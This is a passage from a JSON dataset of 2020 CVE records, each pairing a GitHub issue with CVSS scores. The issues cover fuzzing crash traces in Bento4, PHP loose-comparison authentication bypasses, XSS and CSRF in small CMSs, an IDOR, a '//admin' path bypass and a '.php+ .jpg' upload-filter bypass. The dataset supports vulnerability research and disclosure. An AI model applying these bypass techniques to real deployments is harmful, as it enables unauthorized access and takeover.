  55726. "description": "Heap buffer overflow in APITAG int, unsigned char, unsigned int, APITAG I use my fuzzing project framework to find some vulnerabilities in mp NUMBERTAG aac with command line: mp NUMBERTAG aac APITAG /tmp/out.aac I found a heap buffer overflow in APITAG int, unsigned char, unsigned int, APITAG The output of address sanitizer is like this: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG at pc NUMBERTAG a NUMBERTAG bp NUMBERTAG fff NUMBERTAG bd0 sp NUMBERTAG fff NUMBERTAG bc8 READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG thread T NUMBERTAG a NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG fc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG b NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG c8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f7c4ad NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in operator APITAG long) PATHTAG NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG fc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG b NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG c8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f7c4ad NUMBERTAG e2 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) in APITAG int, unsigned char, unsigned int, APITAG Shadow bytes around the buggy address NUMBERTAG c0e7fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  55727. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55728. "severity": "HIGH",
  55729. "baseScore": 7.5,
  55730. "impactScore": 3.6,
  55731. "exploitabilityScore": 3.9
  55732. },
  55733. {
  55734. "CVE_ID": "CVE-2020-23334",
  55735. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/508",
  55736. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/508",
  55737. "Repo_new": "axiomatic-systems/bento4",
  55738. "Issue_Created_At": "2020-05-16T07:59:15Z",
  55739. "description": "SEGV on unknown address by a WRITE memory access in APITAG int, unsigned long long, APITAG I found a crash by running \"./mp NUMBERTAG aac APITAG APITAG The crash is identified as \"EXPLOITABLE\" by crashwalk. The result of crashwalk (!exploitable) is: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG int, unsigned long long, APITAG NUMBERTAG cac NUMBERTAG in PATHTAG Disassembly NUMBERTAG cac NUMBERTAG mov r NUMBERTAG ra NUMBERTAG cac NUMBERTAG call NUMBERTAG ac NUMBERTAG APITAG NUMBERTAG cac6b: lea eax,[rb NUMBERTAG cac6e: mov rsi,r NUMBERTAG cac NUMBERTAG mov rdi,rbp NUMBERTAG cac NUMBERTAG mov BYTE PTR [r NUMBERTAG ra NUMBERTAG cac NUMBERTAG call NUMBERTAG bbc NUMBERTAG APITAG NUMBERTAG cac7e: pop rb NUMBERTAG cac7f: pop rbp NUMBERTAG cac NUMBERTAG pop r NUMBERTAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG cac NUMBERTAG in PATHTAG APITAG NUMBERTAG cbac2: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG dbbfd: in PATHTAG APITAG NUMBERTAG cb NUMBERTAG in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG bdef3: in PATHTAG APITAG NUMBERTAG cbf9c: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG aee5a: in PATHTAG APITAG NUMBERTAG cc NUMBERTAG a: in PATHTAG Registers: ra NUMBERTAG ffffffff rb NUMBERTAG rc NUMBERTAG fe0 rd NUMBERTAG rsi NUMBERTAG fd0 rdi NUMBERTAG fb8 rbp NUMBERTAG fb8 rsp NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG fd0 r NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG r NUMBERTAG ffff7d NUMBERTAG be0 r NUMBERTAG fd0 r NUMBERTAG a0 r NUMBERTAG r NUMBERTAG a0 rip NUMBERTAG cac NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation on destination operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. END SUMMARY The result of address sanitizer is: APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG cf (pc NUMBERTAG c9eba bp NUMBERTAG ffedaf NUMBERTAG b0 sp NUMBERTAG ffedaf NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG c9eb9 in APITAG int, unsigned long long, APITAG ( PATHTAG NUMBERTAG d3ed8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG ccec in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d3a NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG cf NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG int, unsigned long long, APITAG NUMBERTAG ABORTING",
  55740. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55741. "severity": "HIGH",
  55742. "baseScore": 7.5,
  55743. "impactScore": 3.6,
  55744. "exploitabilityScore": 3.9
  55745. },
  55746. {
  55747. "CVE_ID": "CVE-2020-23355",
  55748. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1121",
  55749. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1121",
  55750. "Repo_new": "codiad/codiad",
  55751. "Issue_Created_At": "2020-05-21T11:11:22Z",
  55752. "description": "Potential risk of authentication bypass through magic hash and loose comparison. PATHTAG () URLTAG is potentially vulnerable to the magic hash problem, and the authentication can be bypassed in the loose comparison (==) If encrypted or hash value for the passwords form certain formats of magic hash, e.g NUMBERTAG e NUMBERTAG it can be bypassed. For example, if the server side stored password is a magic hash, then another user can also try a magic hash password to authenticate. It can be avoided by using strict comparison \u201c===\u201c. More info about magic hash can be found here URLTAG",
  55753. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  55754. "severity": "HIGH",
  55755. "baseScore": 7.5,
  55756. "impactScore": 3.6,
  55757. "exploitabilityScore": 3.9
  55758. },
  55759. {
  55760. "CVE_ID": "CVE-2020-23359",
  55761. "Issue_Url_old": "https://github.com/renlok/WeBid/issues/530",
  55762. "Issue_Url_new": "https://github.com/renlok/webid/issues/530",
  55763. "Repo_new": "renlok/webid",
  55764. "Issue_Created_At": "2020-05-25T08:11:30Z",
  55765. "description": "Funcational bugs in password rechecking during registration related processes. APITAG NUMBERTAG FILETAG has the problem of password rechecking during registration because it uses a loose comparison to check the identicalness of two passwords. Two non identical passwords can still bypass the check. A lot of other PHP scripts in APITAG also have this problem including FILETAG , APITAG FILETAG , APITAG APITAG",
  55766. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55767. "severity": "CRITICAL",
  55768. "baseScore": 9.8,
  55769. "impactScore": 5.9,
  55770. "exploitabilityScore": 3.9
  55771. },
  55772. {
  55773. "CVE_ID": "CVE-2020-23360",
  55774. "Issue_Url_old": "https://github.com/osCommerce/oscommerce2/issues/658",
  55775. "Issue_Url_new": "https://github.com/oscommerce/oscommerce2/issues/658",
  55776. "Repo_new": "oscommerce/oscommerce2",
  55777. "Issue_Created_At": "2020-05-26T05:59:06Z",
  55778. "description": "Username and password recheck bypassed. Hi, I just find that, in many places of oscommerce NUMBERTAG the username and password recheck during registration and other processes can be bypassed easily through the magic string in loose comparison, for example APITAG returns APITAG . If the user sets the username or password to such magic strings, the recheck process using loose comparison (==) does not work at all. Affected code locations PATHTAG URLTAG PATHTAG L NUMBERTAG URLTAG PATHTAG L NUMBERTAG URLTAG PATHTAG L NUMBERTAG URLTAG and some other files in APITAG , APITAG and APITAG",
  55779. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55780. "severity": "CRITICAL",
  55781. "baseScore": 9.8,
  55782. "impactScore": 5.9,
  55783. "exploitabilityScore": 3.9
  55784. },
  55785. {
  55786. "CVE_ID": "CVE-2020-23361",
  55787. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/668",
  55788. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/668",
  55789. "Repo_new": "phplist/phplist3",
  55790. "Issue_Created_At": "2020-05-26T07:47:33Z",
  55791. "description": "Bypass authentication through loose comparison. APITAG URLTAG has the potential of authentication bypass problem through loose comparison. (==). Here is another [example]. URLTAG A similar CVE can be found [ CVETAG CVETAG and here URLTAG In addition, in URLTAG It also uses a loose comparison. The functionality might not perform correctly for the password rechecking in the magic strings cases. For example NUMBERTAG e NUMBERTAG and NUMBERTAG e NUMBERTAG shall be equal under loose comparison, but actually they are not.",
  55792. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55793. "severity": "CRITICAL",
  55794. "baseScore": 9.8,
  55795. "impactScore": 5.9,
  55796. "exploitabilityScore": 3.9
  55797. },
  55798. {
  55799. "CVE_ID": "CVE-2020-23369",
  55800. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/46",
  55801. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/46",
  55802. "Repo_new": "yzmcms/yzmcms",
  55803. "Issue_Created_At": "2020-05-22T17:05:17Z",
  55804. "description": "XSS exists in APITAG NUMBERTAG Description In APITAG NUMBERTAG SS in PATHTAG via the SRC attribute of an IFRAME element because of using APITAG NUMBERTAG APITAG APITAG Script tags are filtered, but iframe tags are not: FILETAG FILETAG Refer to: FILETAG",
  55805. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55806. "severity": "MEDIUM",
  55807. "baseScore": 6.1,
  55808. "impactScore": 2.7,
  55809. "exploitabilityScore": 2.8
  55810. },
  55811. {
  55812. "CVE_ID": "CVE-2020-23370",
  55813. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/45",
  55814. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/45",
  55815. "Repo_new": "yzmcms/yzmcms",
  55816. "Issue_Created_At": "2020-05-22T16:55:04Z",
  55817. "description": "A Stored XSS exists in APITAG NUMBERTAG Description In APITAG NUMBERTAG Stored XSS exists via the PATHTAG action parameter, which allows remote attackers to upload a swf file. The swf file can be injected arbitrary web script or HTML. APITAG In PATHTAG when the value of action parameter is 'uploadvideo' or 'uploadfile', it allows remote user to upload a swf file: CODETAG So I write and compile an evil swf file whose source code is as follows: APITAG Then I upload the swf file through PATHTAG without login: FILETAG When background administrator previews this attachment, it will cause XSS attack: FILETAG",
  55818. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55819. "severity": "MEDIUM",
  55820. "baseScore": 5.4,
  55821. "impactScore": 2.7,
  55822. "exploitabilityScore": 2.3
  55823. },
  55824. {
  55825. "CVE_ID": "CVE-2020-23371",
  55826. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/30",
  55827. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/30",
  55828. "Repo_new": "nangge/nonecms",
  55829. "Issue_Created_At": "2020-06-02T14:43:00Z",
  55830. "description": "APITAG NUMBERTAG has a XSS vulnerability in PATHTAG APITAG NUMBERTAG has a XSS vulnerability in PATHTAG I download the swfupload.swf file and I use APITAG to decompile the file. Then I find that user can control the APITAG parameter which will concatenate as the value of APITAG FILETAG Then I check the APITAG function, this is a piece of code that exists a Flash XSS vulnerability: FILETAG",
  55831. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55832. "severity": "MEDIUM",
  55833. "baseScore": 6.1,
  55834. "impactScore": 2.7,
  55835. "exploitabilityScore": 2.8
  55836. },
  55837. {
  55838. "CVE_ID": "CVE-2020-23373",
  55839. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/33",
  55840. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/33",
  55841. "Repo_new": "nangge/nonecms",
  55842. "Issue_Created_At": "2020-06-03T02:49:26Z",
  55843. "description": "APITAG NUMBERTAG has a stored XSS vulnerability in PATHTAG Cross site scripting (XSS) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter. A remote user who has the right to modify navigation management can inject arbitrary web script or HTML in PATHTAG via the name parameter to cause xss attack. APITAG ERRORTAG FILETAG When front end users visit this column, it can also cause xss attack: APITAG FILETAG",
  55844. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55845. "severity": "MEDIUM",
  55846. "baseScore": 5.4,
  55847. "impactScore": 2.7,
  55848. "exploitabilityScore": 2.3
  55849. },
  55850. {
  55851. "CVE_ID": "CVE-2020-23374",
  55852. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/32",
  55853. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/32",
  55854. "Repo_new": "nangge/nonecms",
  55855. "Issue_Created_At": "2020-06-03T02:42:24Z",
  55856. "description": "APITAG NUMBERTAG has a XSS vulnerability. Cross site scripting (XSS) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter. By default, APITAG uses FILETAG for users to editor their articles. However, FILETAG has a XSS vulnerability. A remote user who has the right to editor articles can inject arbitrary web script or HTML in PATHTAG APITAG ERRORTAG APITAG FILETAG",
  55857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55858. "severity": "MEDIUM",
  55859. "baseScore": 5.4,
  55860. "impactScore": 2.7,
  55861. "exploitabilityScore": 2.3
  55862. },
  55863. {
  55864. "CVE_ID": "CVE-2020-23376",
  55865. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/35",
  55866. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/35",
  55867. "Repo_new": "nangge/nonecms",
  55868. "Issue_Created_At": "2020-06-04T12:01:26Z",
  55869. "description": "APITAG NUMBERTAG has a CSRF vulnerability in PATHTAG APITAG NUMBERTAG has a CSRF vulnerability in PATHTAG as demonstrated by adding a navigation column which can be injected arbitrary web script or HTML via the name parameter to launch a stored XSS attack. Vulnerability code is located in PATHTAG ERRORTAG No CSRF token here. We can also use APITAG as proxy to see that the PATHTAG API doesn't use csrf token: FILETAG When the administrator visits the malicious link, the page will automatically click to trigger the CSRF attack: FILETAG When back end administrator accesses the background or the front end user accesses the column, it will trigger xss attack: FILETAG",
  55870. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55871. "severity": "MEDIUM",
  55872. "baseScore": 6.1,
  55873. "impactScore": 2.7,
  55874. "exploitabilityScore": 2.8
  55875. },
  55876. {
  55877. "CVE_ID": "CVE-2020-23447",
  55878. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/33",
  55879. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/33",
  55880. "Repo_new": "newbee-ltd/newbee-mall",
  55881. "Issue_Created_At": "2020-05-27T01:07:36Z",
  55882. "description": "There is xss in the front desk which can get hazards such as administrator cookies. APITAG an environment to simulate users selecting products at the front desk\u2014\u2014add to cart\u2014\u2014confirm order pay\uff1a URLTAG Insert the payload here at the harvest information: APITAG alert APITAG APITAG FILETAG APITAG the administrator logs in to the background, XSS will be triggered when viewing the APITAG Recipient Information\" of this order in the APITAG Management Office\" FILETAG",
  55883. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55884. "severity": "MEDIUM",
  55885. "baseScore": 6.1,
  55886. "impactScore": 2.7,
  55887. "exploitabilityScore": 2.8
  55888. },
  55889. {
  55890. "CVE_ID": "CVE-2020-23448",
  55891. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/34",
  55892. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/34",
  55893. "Repo_new": "newbee-ltd/newbee-mall",
  55894. "Issue_Created_At": "2020-05-27T02:40:23Z",
  55895. "description": "System background authentication can be bypassed. APITAG authentication logic of the system's background /admin is in code APITAG FILETAG APITAG can easily be bypassed, like request //admin NUMBERTAG We delete the requested cookie field and then request /admin,returns NUMBERTAG FILETAG APITAG if we request //admin\uff0cWe can perform administrator actions without logging in\uff0c For example, upload a babat file\uff1a FILETAG It can execute any server command\uff0csuch as calc\uff1a FILETAG",
  55896. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55897. "severity": "CRITICAL",
  55898. "baseScore": 9.8,
  55899. "impactScore": 5.9,
  55900. "exploitabilityScore": 3.9
  55901. },
  55902. {
  55903. "CVE_ID": "CVE-2020-23449",
  55904. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/35",
  55905. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/35",
  55906. "Repo_new": "newbee-ltd/newbee-mall",
  55907. "Issue_Created_At": "2020-05-27T03:35:28Z",
  55908. "description": "IDOR causes unauthorized changes to any user information. PATHTAG interface can be used to update user information\uff1a FILETAG APITAG corresponding code is as follows\uff1a FILETAG Track APITAG method\uff1a FILETAG APITAG code updates the information after querying by the value of userid, so you can modify any user information by tampering with the value of APITAG",
  55909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  55910. "severity": "HIGH",
  55911. "baseScore": 7.5,
  55912. "impactScore": 3.6,
  55913. "exploitabilityScore": 3.9
  55914. },
  55915. {
  55916. "CVE_ID": "CVE-2020-23469",
  55917. "Issue_Url_old": "https://github.com/gmate/gmate/issues/191",
  55918. "Issue_Url_new": "https://github.com/gmate/gmate/issues/191",
  55919. "Repo_new": "gmate/gmate",
  55920. "Issue_Created_At": "2020-05-29T11:36:15Z",
  55921. "description": "Regular Expression APITAG vulnerability in the gedit3 plugin. Regular Expression APITAG vulnerability in the gedit3 plugin We are working on the APITAG URLTAG problem and detected two vulnerable regexes from your gedit3 plugin code. Vulnerable rege NUMBERTAG APITAG in FILETAG It takes forever for the regex to match the string APITAG We suggest you change the structure APITAG , since \".\" can accept \"<\" and \">\". Vulnerable rege NUMBERTAG FILETAG and FILETAG This vulnerability can be triggered by CODETAG Both APITAG and APITAG can match APITAG , we suggest you to change APITAG since this branch is mainly included in APITAG . We didn\u2019t create a pull request because we're not sure if these cases are possible to take place in your program, we also do not understand the functionality of these regexes as you do. Thank you for your understanding.",
  55922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55923. "severity": "HIGH",
  55924. "baseScore": 7.5,
  55925. "impactScore": 3.6,
  55926. "exploitabilityScore": 3.9
  55927. },
  55928. {
  55929. "CVE_ID": "CVE-2020-23478",
  55930. "Issue_Url_old": "https://github.com/leo-editor/leo-editor/issues/1597",
  55931. "Issue_Url_new": "https://github.com/leo-editor/leo-editor/issues/1597",
  55932. "Repo_new": "leo-editor/leo-editor",
  55933. "Issue_Created_At": "2020-05-29T14:08:29Z",
  55934. "description": "Regular Expression APITAG vulnerabilities in PATHTAG We are working on the APITAG URLTAG problem and detected a vulnerable regex from your code. APITAG in FILETAG takes forever to match the string APITAG We suggest you change the structure APITAG , to APITAG . We didn\u2019t create a pull request because we're not sure if this case is possible to take place in your program, we also do not understand the functionality of the regex as you do. Thank you for your understanding.",
  55935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55936. "severity": "HIGH",
  55937. "baseScore": 7.5,
  55938. "impactScore": 3.6,
  55939. "exploitabilityScore": 3.9
  55940. },
  55941. {
  55942. "CVE_ID": "CVE-2020-23489",
  55943. "Issue_Url_old": "https://github.com/WWBN/AVideo/issues/3117",
  55944. "Issue_Url_new": "https://github.com/wwbn/avideo/issues/3117",
  55945. "Repo_new": "wwbn/avideo",
  55946. "Issue_Created_At": "2020-05-22T09:16:47Z",
  55947. "description": "[URGENT] Serious security issues . Heya, I found NUMBERTAG high critical security issues: User with low privilege can take over the website Local File Include that exposes server files with DB credentials. Where I can report them? posting them here may lead to disaster for users. Best",
  55948. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  55949. "severity": "HIGH",
  55950. "baseScore": 8.8,
  55951. "impactScore": 5.9,
  55952. "exploitabilityScore": 2.8
  55953. },
  55954. {
  55955. "CVE_ID": "CVE-2020-23520",
  55956. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/4",
  55957. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/4",
  55958. "Repo_new": "peacexie/imcat",
  55959. "Issue_Created_At": "2020-06-02T07:09:43Z",
  55960. "description": "File Upload. Describe the bug Upload php files to control the target server Exploit vulnerability \uff1a Upload malicious PHP file here: PATHTAG pyload NUMBERTAG php+ FILETAG : APITAG NUMBERTAG before modification\uff1a FILETAG after modification\uff1a FILETAG connect PHP file: PATHTAG FILETAG FILETAG The Vuln src code: PATHTAG > APITAG > APITAG APITAG can not match .php+ PATHTAG > APITAG > APITAG , because APITAG is only used for checking filename whether or not have jpg. \uff0cso we can upload NUMBERTAG php+ .jpg to bypass filtering. FILETAG FILETAG",
  55961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  55962. "severity": "HIGH",
  55963. "baseScore": 7.2,
  55964. "impactScore": 5.9,
  55965. "exploitabilityScore": 1.2
  55966. },
  55967. {
  55968. "CVE_ID": "CVE-2020-23522",
